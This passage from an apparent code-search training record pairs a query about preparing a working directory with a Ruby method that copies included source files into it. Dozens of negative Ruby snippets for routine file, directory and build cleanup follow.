"0.5308898",
"0.5302462",
"0.52997845",
"0.5299389",
"0.529219",
"0.52854824",
"0.52854824",
"0.52750796",
"0.5249132",
"0.5247055",
"0.52433753",
"0.5240892",
"0.522188",
"0.5207923",
"0.52061456",
"0.52029115",
"0.52029",
"0.5199177",
"0.518809",
"0.5184941",
"0.5184941",
"0.5184941",
"0.5179138",
"0.5162527",
"0.5156738",
"0.51558757",
"0.51558757",
"0.51518726",
"0.51472807",
"0.5122639",
"0.511081",
"0.51022124",
"0.51019484",
"0.5101752",
"0.51012063",
"0.50943714",
"0.50930023",
"0.5089698",
"0.5089108",
"0.5079886",
"0.5076773",
"0.5076773",
"0.5071118",
"0.50591666",
"0.505506",
"0.50417155",
"0.5040898",
"0.504006"
] |
0.77239615
|
0
|
If the working dir doesn't exist, make it; if it does exist, clean it out
|
def prepare_working_dir
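  # mkdir_p creates any missing parent directories and is a no-op when the target already exists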
FileUtils.mkdir_p @working_dir unless File.directory?(@working_dir)
FileUtils.rm_rf Dir["#{@working_dir}/*"] if @force_rebuild
end
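
Since FileUtils.mkdir_p already does nothing when the directory exists, the File.directory? guard is belt-and-braces, and the clean-out only fires when @force_rebuild is set. A minimal self-contained sketch of the same idea, assuming only the Ruby standard library (the method name and keyword argument here are illustrative, not from the original):

require 'fileutils'

# Ensure a working directory exists; optionally empty it first.
def prepare_working_dir(working_dir, force_rebuild: false)
  FileUtils.mkdir_p(working_dir)                        # no-op if it already exists
  FileUtils.rm_rf(Dir.glob("#{working_dir}/*")) if force_rebuild
end

prepare_working_dir('/tmp/build', force_rebuild: true)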
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def clean_up\n FileUtils.rm_rf \"#{@path}\" unless create_in_current_directory?\n FileUtils.rm_rf \"#{@cache}\"\n end",
"def clean_dir\n\n path = self.get_dir\n _clean_dir(path)\n end",
"def clean_dir\n File.join clean_dir_parent, name\n end",
"def clean\n needs_cleaning = File.exist?(project_dir)\n if needs_cleaning\n log.info(log_key) { \"Cleaning project directory `#{project_dir}'\" }\n FileUtils.rm_rf(project_dir)\n end\n create_required_directories\n deploy\n needs_cleaning\n end",
"def clean_up\n Dir.foreach(Dir.pwd) do |f|\n if !f.start_with?('tmp_') then next\n elsif File.directory?(f) then FileUtils.rm_rf(f)\n else FileUtils.rm(f)\n end\n end\nend",
"def clean_up\n FileUtils.rm_rf @temp_root\n end",
"def cleanup\n if Dir.exists?(WORKFOLDER)\n FileUtils.remove_dir(WORKFOLDER)\n print_status(\"Workspace \\\"#{WORKFOLDER}\\\" deleted.\")\n end\nend",
"def clean_paths\n FileUtils.rm_rf(tmp_path)\n FileUtils.mkdir_p(tmp_path)\n end",
"def clean\n #rm_r(srcdir)\n rm_r(blddir)\n #rm_r(libdir)\n end",
"def cleanup\n FileUtils.rm(@out_filename)\n\n # XXX: could be rm-rf, but be safe for now. Might have\n # problems if app creates files in $PWD\n FileUtils.rmdir(@opts[:tmpdir])\n end",
"def clean!\n FileUtils.rm_rf(dir)\n end",
"def clean_test_dir!\n FileUtils.remove_entry_secure test_dir\n end",
"def reset_dir(pathname)\n\tputs \" Deleting and recreating #{pathname} folder\"\n\tFileUtils.rm_rf(pathname) unless not Dir.exist?(pathname)\n\tDir.mkdir(pathname)\nend",
"def cleanup\n tmpdir = File.join(OBS_BUILD_DIR,OBS_LOCAL_TMP)\n if File.exists?(tmpdir)\n FileUtils.rm_rf(tmpdir)\n end\n end",
"def make_output_dir (src_path)\n delete_all_files(src_path) if directory_exists?(src_path) == true\n Dir.mkdir(src_path)\nend",
"def clean!\n stop\n FileUtils.remove_entry(download_path) if File.exists? download_path\n FileUtils.remove_entry(tmp_save_dir, true) if File.exists? tmp_save_dir\n FileUtils.remove_entry(instance_dir, true) if File.exists? instance_dir\n FileUtils.remove_entry(md5sum_path) if File.exists? md5sum_path\n FileUtils.remove_entry(version_file) if File.exists? version_file\n end",
"def clean!\n stop\n FileUtils.remove_entry(download_path) if File.exists? download_path\n FileUtils.remove_entry(tmp_save_dir, true) if File.exists? tmp_save_dir\n FileUtils.remove_entry(instance_dir, true) if File.exists? instance_dir\n FileUtils.remove_entry(md5sum_path) if File.exists? md5sum_path\n FileUtils.remove_entry(version_file) if File.exists? version_file\n end",
"def make_work_folder_if_empty\n unless Dir.exists?(WORKFOLDER)\n FileUtils.mkdir_p(WORKFOLDER)\n print_status(\"Workspace \\\"#{WORKFOLDER}\\\" created\")\n end\nend",
"def destroy!\n fail \"Can not destroy a running stone\" if running?\n rm_rf system_config_filename\n rm_rf extent_directory\n rm_rf log_directory\n rm_rf tranlog_directories\n end",
"def destroy\n FileUtils.rm_rf(@working_dir)\n end",
"def clean_wiki_folders\n puts \"Trying to clean the wiki\"\n if File.exist?(g('wiki_dest'))\n #puts \"Removing Folder \"+g('wiki_dest')\n removeFolder(\"\") \n end\n #puts \"Creating Folder \"+g('wiki_dest')\n FileUtils.mkdir(g('wiki_dest'))\nend",
"def purge\n\n FileUtils.remove_dir(@basepath)\n end",
"def ensure_directory_exists\r\n dir = File.dirname(full_path_from_current_attributes)\r\n FileUtils.mkdir_p(dir) unless File.exists?(dir)\r\n end",
"def prep_build\n stdout.out_success(\"\\nPreparing build dir at: '#{settings['build_dir']}'\")\n stdout.verbose(\"Removing build dir at: #{settings['build_dir']}\")\n FileUtils.rm_rf(settings['build_dir'])\n # create the build dir\n stdout.verbose(\"Creating build dir at: #{settings['build_dir']}\")\n FileUtils.mkdir(settings['build_dir'])\n end",
"def remove_dirs()\n puts \"Removing test directories...\"\n \n if File::exist?(\"tmp\") && File::directory?(\"tmp\")\n FileUtils.rm_rf(\"tmp\") \n end\n exit 0\nend",
"def clean\n cache = Cache.instance\n # remove all built files\n cache.targets(false).each do |target|\n cache.remove_target(target)\n FileUtils.rm_f(target)\n end\n # remove all created directories if they are empty\n cache.directories(false).sort {|a, b| b.size <=> a.size}.each do |directory|\n cache.remove_directory(directory)\n next unless File.directory?(directory)\n if (Dir.entries(directory) - ['.', '..']).empty?\n Dir.rmdir(directory) rescue nil\n end\n end\n cache.write\n end",
"def clean\n FileUtils.remove_dir(@log_dir, true)\n end",
"def clean_tmp_upload_dir\n FileUtils.rm_r(tmp_upload_dir) if self.tmp_upload_dir && File.directory?(self.tmp_upload_dir)\n end",
"def cleanup_dirs\n @cleanup_dirs ||= ['.']\n end",
"def clean_tmp_dir\n system \"rm -rf #{TMP_PATH}\"\n system \"mkdir #{TMP_PATH}\"\n yield\n system \"rm -rf #{TMP_PATH}\"\n system \"mkdir #{TMP_PATH}\"\n end",
"def check_or_create_working_dir\n unless Dir.exists?(@working_directory)\n if File.writable?(@working_directory.split(\"/\")[0...-1].join(\"/\"))\n Dir.mkdir(@working_directory)\n return true if Dir.exists?(@working_directory)\n end\n end\n Loggers::Main.log.warn \"Creation of #{@working_directory} failed!\"\n end",
"def cleanup\n if File.exist?(@scalerui_dir)\n print \"Cleaning up directories...\"\n FileUtils.rm_r(@scalerui_dir)\n puts \"done\"\n else\n puts \"Nothing to clean up!\"\n end\n end",
"def clean\n FileUtils.rm_rf(\"#{ROOT_DATA_FOLDER}/.\", secure: true)\n unless File.directory?(ROOT_DATA_FOLDER)\n FileUtils.mkdir_p(ROOT_DATA_FOLDER)\n end\n end",
"def createEmptyFolder(path)\n FileUtils.remove_dir(path) if Dir.exist?(path)\n FileUtils.mkdir_p(path)\nend",
"def fileCleanPath(pathName) \n pathName.mkpath()\n begin\n pathName.rmtree()\n rescue\n puts \"Cannot delete: \" + pathName.to_s\n end\n pathName.mkpath()\nend",
"def reset_signup_folder\n FileUtils.rm_rf('./tmp/signup')\nend",
"def clean!\n FileUtils.rm(self[:build_path]) if File.exist?(self[:build_path])\n FileUtils.rm(self[:staging_path]) if File.exist?(self[:staging_path])\n return self\n end",
"def clean_installation\n clean_paths.each { |path| FileUtils.rm_rf(path) }\n end",
"def clean_dir_root\n File.join(root_dir, \"test\", \"tmp\", \"cleanreps\")\n end",
"def clean()\n\t\ttmpdir = Dir.open(@tmpout) do |dir|\n\t\t\tdir.each do |file|\n\t\t\t\tif file != \".\" and file != \"..\" then\n\t\t\t\t\tFile.unlink(@tmpout + \"/\" + file)\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tDir.rmdir @tmpout\n\tend",
"def cleanup\n if dir and File.exists?(dir)\n FileUtils.rm_rf(dir)\n end\n\n nil\n end",
"def clean_working_directory_check\n commit_count_check = `git status`\n if (!(commit_count_check.include? \"Your branch is up-to-date with 'origin/master'.\") &&\n !(commit_count_check.include? \"nothing to commit, working directory clean\")) ||\n (commit_count_check.include? \"Changes not staged for commit:\")\n abort(\"ABORTING... please commit and push any local changes before atte\"\\\n \"mpting to create a new tag\")\n end\n end",
"def clean!\n clean_installation if !local?\n end",
"def cleanUpWorkingFiles()\n system(\"rm -f #{@tripFile} #{routeFile} #{routeAltFile}\") ;\n end",
"def cleanup(build_dir)\n build_dir = Pathname(build_dir)\n tmp_build_dir = Pathname('.temp-build')\n\n # copy over files we need to keep\n if File.directory?(build_dir)\n build_dir.glob(\"**/all-product-headers.yaml\").each do |file|\n intermediate = Pathname(file).relative_path_from(build_dir).dirname\n destination_dir = tmp_build_dir + intermediate\n\n FileUtils.mkdir_p(destination_dir)\n FileUtils.mv(file, destination_dir)\n end\n\n build_dir.rmtree if build_dir.directory?\n FileUtils.mv(tmp_build_dir, build_dir)\n end\nend",
"def teardown\n Dir.chdir '..'\n FileUtils.rm_rf @tempdirname\n end",
"def clearDistributionDirectory(projectDir)\n distDir = projectDir.to_s + '/dist'\n FileUtils.rm_rf(distDir)\n FileUtils.mkdir_p(distDir)\nend",
"def delete_dir!(path)\n # do nothing, because there's no such things as 'empty directory'\n end",
"def clean!\n stop\n remove_instance_dir!\n FileUtils.remove_entry(config.download_path) if File.exists?(config.download_path)\n FileUtils.remove_entry(config.tmp_save_dir, true) if File.exists? config.tmp_save_dir\n md5.clean!\n FileUtils.remove_entry(config.version_file) if File.exists? config.version_file\n end",
"def tidy_up\n return if DEBUG\n\n puts heading(\"Tidying up PWD\")\n\n FileUtils.remove(Dir[\"#{FileUtils.pwd}/bugsnag-*.tgz\"])\nend",
"def destroy()\n\n path = self.get_dir\n FileUtils.remove_entry_secure(path, true)\n _clean_dir(File.dirname(path))\n\n super()\n end",
"def remove_structure\n rm_rf target_dir\n end",
"def make_tmp_dir\n FileUtils.mkdir_p @log_dir\n Dir[\"#{@log_dir}/*\"].each do |file|\n FileUtils.rm_rf file\n end\n end",
"def clean_up\n execute(\"rm -rf #{namespace_dir}\")\n end",
"def purge_directory(path)\n remove_directory(path)\n create_directory(path)\n end",
"def purge_directory(path)\n remove_directory(path)\n create_directory(path)\n end",
"def cleanTmp\n ts_str = \"/tmp/d\" + Date.today.strftime(\"%Y%m%d\") + \"-*\"\n Gitchefsync.logger.info \"clean up of #{ts_str}\"\n FS.cmdNoError \"sudo rm -fr #{ts_str}\"\n end",
"def teardown\n FileUtils.chdir(@default_folder)\n FileUtils.rm_r('tmp')\n\n assert_false(File.exists?('tmp'))\n end",
"def in_pristine_fake_libraries_dir(example)\n d = Dir.mktmpdir\n begin\n # write a yaml file containing the current directory\n dummy_config = { \"directories\" => { \"user\" => d.to_s } }\n @arduino_dir = Pathname.new(d)\n @libraries_dir = @arduino_dir + \"libraries\"\n Dir.mkdir(@libraries_dir)\n\n f = File.open(@config_file, \"w\")\n begin\n f.write dummy_config.to_yaml\n f.close\n example.run\n ensure\n begin\n File.unlink(@config_file)\n rescue Errno::ENOENT\n # cool, already done\n end\n end\n ensure\n if ArduinoCI::Host.needs_symlink_hack?\n stdout, stderr, exitstatus = Open3.capture3('cmd.exe', \"/c rmdir /s /q #{ArduinoCI::Host.pathname_to_windows(d)}\")\n unless exitstatus.success?\n puts \"====== rmdir of #{d} failed\"\n puts stdout\n puts stderr\n end\n else\n FileUtils.remove_entry(d)\n end\n end\n end",
"def clean_up\n pathname.delete if pathname.exist?\n end",
"def create_server_dir\n @task.remove_dir @path\n @task.empty_directory @path\n end",
"def remove_empty_directory(path = nil)\r\n dir = path || File.dirname(full_path)\r\n dir.gsub!(/(\\/+\\.\\.?\\/*)*$/, '')\r\n system_files = %w(Thumbs.db .DS_Store)\r\n if File.directory?(dir) and !File.symlink?(dir) and (Dir.entries(dir) - %w(. ..) - system_files).empty?\r\n system_files.each { |sys| File.delete(\"#{dir}/#{sys}\") if File.exists?(\"#{dir}/#{sys}\") }\r\n Dir.rmdir(dir)\r\n remove_empty_directory(dir.gsub(/\\/+[^\\/]*\\/*$/, ''))\r\n end\r\n end",
"def rm_and_mkdir(dir)\n raise \"don't do this\" if dir == \"\"\n run \"rm -rf #{dir} && mkdir -p #{dir}\"\n end",
"def remove_basedir\n FileUtils.remove_entry_secure(@basedir) if @basedir.exist?\n end",
"def destroy_scratch_dir\n FileUtils.rm_rf( @scratch_dir )\n end",
"def clear\n raise \"unsafe test stage directory -- #{Dir.pwd}\" unless /#{Dir.tmpdir}/ =~ Dir.pwd\n Dir['*'].each do |path|\n FileUtils.rm_r(path)\n end\n end",
"def delete_temp_dir\n\t\tself.rm_str(\" -rf \", @@dir_temp)\n\tend",
"def ensure_directory\n FileUtils.mkdir_p(to_s)\n self\n end",
"def setup_tmp_dir(koan)\n FileUtils.mkdir \"tmp\" unless Dir.exist? \"tmp\"\n if Dir.exist? \"tmp/#{koan.name}\"\n FileUtils.rm_rf \"tmp/#{koan.name}/*\"\n puts \"rm -rf tmp/#{koan.name}/*\"\n else\n FileUtils.mkdir \"tmp/#{koan.name}\"\n puts \"mkdir tmp/#{koan.name}\"\n end\nend",
"def cleanall\n FileUtils.rm_r(OUTPUT_DIR, force: true, verbose: true)\n end",
"def clean_file\n staged_root.join(\"clean.sh\")\n end",
"def docClean\n dir = Pathname.new pathDocuments\n fileCleanPath(dir)\nend",
"def preclean_project\n # Clean-up non-useful files (if any)\n clean_msg = `make clean 2>&1`\n @log_file.puts \"\\nNettoyage du répertoire :\\n\\n#{clean_msg}\"\n \n # I want to be sure...\n FileUtils::rm_f Dir.glob(\"*.o\")\n FileUtils::rm_f Dir.glob(\"*~\")\n end",
"def clean_app()\n wd = FileUtils.pwd()\n FileUtils.rm_f( [\n '/app/assets/*',\n '/app/components/*',\n '/app/controllers/*',\n '/app/helpers/*',\n '/app/models/*',\n '/app/views/*'\n ].collect!{|e| Dir.glob(wd + e)}.flatten.compact )\n end",
"def create_dirs\n FileUtils.mkdir_p(@work_dir) unless File.exist?(@work_dir)\n end",
"def clean_build_directory\n FileUtils.rm_rf Dir.glob(File.join(@project.build_path, '*'))\n end",
"def prepare_workspace\n # create the local backup directory if it doesn't exist\n puts \"Checking workspace...\" if options[:verbose]\n unless File.directory?(backup_directory)\n Dir.mkdir(backup_directory)\n end\n unless File.directory?(temp_directory)\n Dir.mkdir(temp_directory)\n end\n Dir.chdir(backup_directory)\n # check local count against existing backups and delete if needed\n puts \"Checking and clearing archives...\" if options[:verbose]\n backup_files = Dir.glob('*').sort_by{ |f| File.ctime(f) }\n if (backup_files.count > (local_count * total_databases))\n number_to_remove = backup_files.count - (local_count * total_databases)\n backup_files.slice(0, number_to_remove).each { |f| File.delete(f) }\n end\n end",
"def prepare\n FileUtils.rm_rf(output_dir)\n FileUtils.mkdir_p(output_dir)\n end",
"def prepare\n FileUtils.rm_rf(output_dir)\n FileUtils.mkdir_p(output_dir)\n end",
"def remove_tmp_dir\n if Dir.exist?(File.expand_path('../tmp/', File.dirname(__FILE__)))\n FileUtils.rm_rf(File.expand_path('../tmp/', File.dirname(__FILE__)))\n end \n end",
"def prepare_target_dir\n begin\n FileUtils.mkdir(@output_dir)\n copy_default_files\n rescue Errno::EEXIST\n puts \"-- #{output_dir} already exists -- canceling initialization. \"\n return\n end\n end",
"def delete\n File.delete fullpath\n dirname = File.dirname(fullpath)\n while dirname != root\n Dir.rmdir(dirname)\n dirname = File.dirname(dirname)\n end\n rescue Errno::ENOTEMPTY\n end",
"def cleanup_workspace\n FileUtils.rm_rf(@workspace)\n end",
"def _prepare_dir(project)\n tmp_path = Rails.root.join(\"tmp/git_checkout/#{Rails.env}/#{project.id}/#{project.path_with_namespace}\")\n tmp_path.mkpath unless tmp_path.exist?\n\n return tmp_path\n end",
"def spec_clean\n Dir.chdir(project_root) do\n Debug.log(\"cd to #{project_root}\")\n fixtures = File.join(profile_path, 'spec', 'fixtures', 'modules')\n modules = File.join(project_root, 'modules')\n\n abort if fixtures == '' || !fixtures\n abort if modules == '' || !modules\n\n FileUtils.rm_rf(fixtures)\n FileUtils.rm_rf(modules)\n end\n Debug.log \"cd to #{Dir.pwd}\"\n end",
"def clear_base_location\n tmpdir = dir + \"base_removed\"\n base_location.move(tmpdir)\n base_location.mkdir\n tmpdir.delete\n end",
"def clean(ant)\n @build_dir.delete\n end",
"def empty_directory(directory)\n return unless File.exist?(directory)\n\n FileUtils.remove_entry(directory)\n FileUtils.mkdir(directory)\nend",
"def rmdir_if_empty_ie path\n rmdir path if File.exist?(path) && dir_empty?(path)\n end",
"def prepare_local_folder(local_file_path)\n FileUtils.mkdir_p(backup_folder)\n File.delete(local_file_path) if File.exist?(local_file_path)\n end",
"def rmdir() Dir.rmdir( expand_tilde ) end",
"def cleanup_state\n delete_if_exists(state_file_path)\n delete_if_exists(chef_file_path)\n delete_if_exists(past_scripts_path)\n delete_if_exists(log_path)\n end",
"def prepare\n #let's mark ourselves as dirty if any of our dependents are dirty\n if dependents.values.detect(&:'dirty?')\n mark_dirty\n end\n dependents.values.each {|child| child.prepare}\n\n if dirty?\n delete_clean_dir\n end\n\n #if the directory is there, we don't need to do anything\n if !File.exist?(clean_dir)\n Dir.chdir clean_dir_parent do\n mark_dirty\n if pristine_exists? && !pristine_dirty?\n copy_pristine_here\n else\n build_here\n end\n unmark_dirty\n\n copy_clean_to_pristine\n end\n end\n end",
"def cleanup\n if ::File.exist?(chef_backup_dir) # rubocop:disable Style/GuardClause\n converge_by(\"removing #{chef_backup_dir}\") do\n FileUtils.rm_rf chef_backup_dir\n end\n end\nend",
"def clean_dir_parent\n if subpath.empty?\n clean_dir_root\n else\n File.join clean_dir_root, subpath\n end\n end",
"def clean(name)\n return false if exists?(name)\n path = File.join(directory, dir_name(name))\n FileUtils.rm_rf(path)\n end",
"def git_clean_filesystem\n mysystem('git clean -f -d -x 2> /dev/null > /dev/null')\n end",
"def cleanup_files\n FileUtils.rm_rf(File.join(Rails.root, \"tmp\"))\n end",
"def clean\n if File.exist?(@destination)\n Monolith.formatter.clean(@cookbook, @destination)\n FileUtils.rm_rf(@destination)\n true\n else\n rel_dest = Monolith.formatter.rel_dir(@destination)\n Monolith.formatter.skip(@cookbook, \"#{rel_dest} doesn't exist\")\n nil\n end\n end",
"def pkg_clean\n sysprint \"#{@name} clean\"\n\n FileUtils::rm_rf(@objdir, :secure => true)\n end"
] |
[
"0.76405054",
"0.7408624",
"0.7186648",
"0.71587247",
"0.70376396",
"0.70326406",
"0.7000289",
"0.69984543",
"0.6984926",
"0.6920283",
"0.6874696",
"0.67769",
"0.67683226",
"0.67443323",
"0.67343736",
"0.6714536",
"0.6714536",
"0.6690504",
"0.66625756",
"0.66347367",
"0.66268283",
"0.66055816",
"0.6603225",
"0.6598229",
"0.6594854",
"0.65693825",
"0.6556986",
"0.6552396",
"0.6550848",
"0.6545083",
"0.65215975",
"0.6512891",
"0.65003484",
"0.6490946",
"0.64760345",
"0.6475248",
"0.6473033",
"0.6467839",
"0.64574534",
"0.6434629",
"0.64325655",
"0.6416905",
"0.64084625",
"0.63868976",
"0.63636374",
"0.63605535",
"0.6359141",
"0.63554585",
"0.63490325",
"0.63428235",
"0.63276386",
"0.62964195",
"0.628384",
"0.62822443",
"0.62685174",
"0.62685174",
"0.6267299",
"0.625938",
"0.62581086",
"0.6254412",
"0.62516874",
"0.6248206",
"0.6236415",
"0.6212771",
"0.62017846",
"0.61924154",
"0.6189925",
"0.61891615",
"0.617603",
"0.6174983",
"0.61735684",
"0.6156471",
"0.6153765",
"0.6144969",
"0.6134037",
"0.6123452",
"0.6119587",
"0.6113484",
"0.61133087",
"0.61103344",
"0.6108131",
"0.61032224",
"0.6097397",
"0.6088153",
"0.6087841",
"0.60873157",
"0.6080542",
"0.6080131",
"0.60792184",
"0.60781854",
"0.60759956",
"0.60756296",
"0.607121",
"0.60699415",
"0.6059479",
"0.6058849",
"0.6051428",
"0.60336894",
"0.603163",
"0.60238576"
] |
0.82474655
|
0
|
Make sure that any files or globs of files in :include_source_files are copied into the working directory before compilation
|
def process_other_source_files
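  # Each entry may be a literal path or a glob; Dir[] expands it to the matching files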
files = @options[:include_source_files].flatten
files.each do |f|
FileUtils.cp Dir[f], @working_dir
end
end
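
Because Dir[f] expands each glob before the copy, a plain file path passes through unchanged and an empty match simply copies nothing; note that FileUtils.cp raises if a glob matches a directory. A minimal standalone sketch under those assumptions (the method name and the empty-match warning are illustrative additions, not from the original):

require 'fileutils'

# Copy every file matched by a list of paths or globs into a working directory.
def copy_sources(patterns, working_dir)
  patterns.flatten.each do |pattern|
    matches = Dir.glob(pattern)
    warn "nothing matched #{pattern}" if matches.empty?
    FileUtils.cp(matches, working_dir)  # use FileUtils.cp_r if globs may match directories
  end
end

copy_sources(['src/*.c', 'include/*.h'], 'build/work')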
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def update include_dirs, source\r\n if not @source_files.include? source\r\n @source_files << source\r\n end\r\n update_depends include_dirs, source\r\n end",
"def setup_source_files\n project.sources.each do |src|\n # Figure out where stuff should come from and go to\n source_file = src\n object_file = objectsify src\n compile_task object_file, source_file\n end#project.sources.each\n end",
"def copy_include_files\n include_directory = Pathname.new(@env[\"package.directory\"]).join(\"include\")\n\n @env[\"package.files\"].each do |from, dest|\n # We place the file in the include directory\n to = include_directory.join(dest)\n\n @env[:ui].info I18n.t(\"vagrant.actions.general.package.packaging\", :file => from)\n FileUtils.mkdir_p(to.parent)\n\n # Copy direcotry contents recursively.\n if File.directory?(from)\n FileUtils.cp_r(Dir.glob(from), to.parent, :preserve => true)\n else\n FileUtils.cp(from, to, :preserve => true)\n end\n end\n end",
"def included_files; end",
"def source_files; end",
"def test_automatically_sets_include_sources_argument\n assert_equal( 'test/fixtures/target', @cmd.include_sources )\n end",
"def compile_files(files)\n files.each do |base_path|\n # We do this second glob in case the path provided in the tayfile\n # references a compiled version\n Dir[@base_dir.join('src', base_path + '*')].each do |path|\n path = Pathname.new(path).relative_path_from(@base_dir.join('src'))\n file_in_path = @base_dir.join('src', path)\n file_out_path = asset_output_filename(@output_dir.join(path), @sprockets.engines.keys)\n\n if @sprockets.extensions.include?(path.extname)\n content = @sprockets[file_in_path].to_s\n else\n content = File.read(file_in_path)\n end\n\n FileUtils.mkdir_p(file_out_path.dirname)\n File.open(file_out_path, 'w') do |f|\n f.write content\n end\n end\n end\n end",
"def build_sources\n sources = [File.join(source_dir, 'jasmine-webos-core.js'),\n File.join(source_dir, 'proxy-app-assistant.js')]\n\n sources += Dir.glob(\"#{source_dir}/**/*.js\").reject { |f| sources.include?(f) }.sort\n sources += Dir.glob(\"#{plugin_dir}/spec/helpers/*.js\")\n sources\nend",
"def copy_sources!\n FileUtils.cp_r(TEMPLATES + 'sources/.', @sources_path)\n end",
"def add_files(frameworks_build_phase, files, lib_group, relative_source_directory)\n\tfiles.each { |file|\n\t\tif file != \".\" && file != \"..\"\n\t\t\ta_ref = lib_group.new_file(relative_source_directory + file)\n\t\t\tframeworks_build_phase.add_file_reference(a_ref, true)\n\t\tend\n\t}\nend",
"def all_files_included?\n file_paths = files.map { |f| File.join(package_path, f[:path]) }\n \n package_files = if defined? package_id\n Dir.glob(File.join(package_path, package_id, \"**\", \"*\"))\n else\n Dir.glob(File.join(package_path, 'files', '**', '*'))\n end\n package_files = package_files.select { |f| File.file? f }\n\n package_files.each do |p|\n errors.add :coverage, \"#{p} is in the package but is not covered by the\" +\n \" representation(s)\" unless file_paths.include?(p) \n end\n \n return errors.on(:coverage).nil?\n\n end",
"def add_source_files_references\n UI.message '- Adding source files' do\n add_file_accessors_paths_to_pods_group(:source_files, nil, true)\n end\n end",
"def add_template_repository_to_source_path\n source_paths.unshift(File.dirname(__FILE__))\nend",
"def source_files\n @source_files ||= find_files( @source_search_paths, @source_file_extension ).uniq\n @source_files\n end",
"def source_paths\n [__dir__]\nend",
"def source_paths\n [__dir__]\nend",
"def in_source_dir(*paths); end",
"def copy_files_to_target\n COMMON_RAMMER_FILES.each do |file|\n source = File.join(\"#{@gem_path}/lib/modules/common/\",file)\n FileUtils.cp(source,\"#{@project_name}\")\n $stdout.puts \"\\e[1;32m \\tcreate\\e[0m\\t#{file}\"\n end\n end",
"def bind_files\n @files.each do |source, destination|\n @files[source] = File.join('wix', 'src', destination)\n end\n end",
"def setup_test_files\n project.test_sources.each do |src|\n compile_task objectsify(src), src\n end\n end",
"def source_paths\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def update_source_paths\n source_paths.unshift(root_dir)\n end",
"def cpp_files\n source_files(CPP_EXTENSIONS)\n end",
"def add_files(*files)\n @source_paths &= files\n end",
"def cover_source_by source, specfile\n _source = File.expand_path( \"../../../#{source}\", __FILE__ )\n _spec = File.expand_path(\"../../#{specfile}\", __FILE__)\n FileUtils.touch(_spec) if File.mtime(_source) > File.mtime(_spec)\n File.mtime(_source) <= File.mtime(_spec)\nend",
"def find_includes include_dirs, src\r\n includes = Rake::CParser.parse_file_includes src\r\n res = includes.collect { |inc|\r\n search_includes include_dirs, src, inc\r\n }\r\n res.compact\r\n end",
"def run\n require 'find'\n\n # Get compiled files\n # FIXME: requires #build_reps to have been called\n all_raw_paths = site.compiler.reps.map(&:raw_path)\n compiled_files = all_raw_paths.flatten.compact.select { |f| File.file?(f) }\n\n # Get present files and dirs\n present_files = []\n present_dirs = []\n Find.find(site.config[:output_dir] + '/') do |f|\n present_files << f if File.file?(f)\n present_dirs << f if File.directory?(f)\n end\n\n # Remove stray files\n stray_files = (present_files - compiled_files)\n stray_files.each do |f|\n next if filename_excluded?(f)\n delete_file(f)\n end\n\n # Remove empty directories\n present_dirs.reverse_each do |dir|\n next if Dir.foreach(dir) { |n| break true if n !~ /\\A\\.\\.?\\z/ }\n next if filename_excluded?(dir)\n delete_dir(dir)\n end\n end",
"def load_file_path!\n @files = FilepathScanner.call(\n include_paths,\n exclude_path_regexps,\n recursive_scan: recursive_include\n )\n end",
"def safe_cp(from, to, owner, group, cwd = '', include_paths = [], exclude_paths = [])\n credentials = ''\n credentials += \"-o #{owner} \" if owner\n credentials += \"-g #{group} \" if group\n excludes = find_command_excludes(from, cwd, exclude_paths).join(' ')\n\n copy_files = proc do |from_, cwd_, path_ = ''|\n cwd_ = File.expand_path(File.join('/', cwd_))\n \"if [[ -d #{File.join(from_, cwd_, path_)} ]]; then \" \\\n \"#{dimg.project.find_path} #{File.join(from_, cwd_, path_)} #{excludes} -type f -exec \" \\\n \"#{dimg.project.bash_path} -ec '#{dimg.project.install_path} -D #{credentials} {} \" \\\n \"#{File.join(to, '$(echo {} | ' \\\n \"#{dimg.project.sed_path} -e \\\"s/#{File.join(from_, cwd_).gsub('/', '\\\\/')}//g\\\")\")}' \\\\; ;\" \\\n 'fi'\n end\n\n commands = []\n commands << [dimg.project.install_path, credentials, '-d', to].join(' ')\n commands.concat(include_paths.empty? ? Array(copy_files.call(from, cwd)) : include_paths.map { |path| copy_files.call(from, cwd, path) })\n commands << \"#{dimg.project.find_path} #{to} -type d -exec \" \\\n \"#{dimg.project.bash_path} -ec '#{dimg.project.install_path} -d #{credentials} {}' \\\\;\"\n commands.join(' && ')\n end",
"def execute\n res = @include_list.map { |re_file| IO.read File.join(File.dirname(@file),re_file) }\n res << IO.read(@file)\n res.join \"\\n\"\n end",
"def compile\n tmpdir = Dir.mktmpdir\n Dir.chdir(tmpdir) do |source_dir, build_dir|\n yield source_dir, @build_dir\n end\n\n puts \"Packaging the following files/dirs:\"\n pipe \"ls #{@build_dir}\"\n ensure\n if ENV['DEBUG']\n puts \"Source dir: #{tmpdir}\"\n else\n FileUtils.rm_rf(tmpdir)\n end\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n tempdir = Dir.mktmpdir(\"template-tmp\")\n source_paths.unshift(tempdir + \"/rails/muffi_template\")\n at_exit {FileUtils.remove_entry(tempdir)}\n git clone: [\n \"--quiet\",\n \"https://github.com/abtion/guidelines.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def add_template_repo_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"springer-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n \"--quiet\",\n \"https://github.com/troyizzle/springer.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{springer/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def source_paths\n Array(super) +\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n Array(super) +\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n Array(super) +\n [File.expand_path(File.dirname(__FILE__))]\nend",
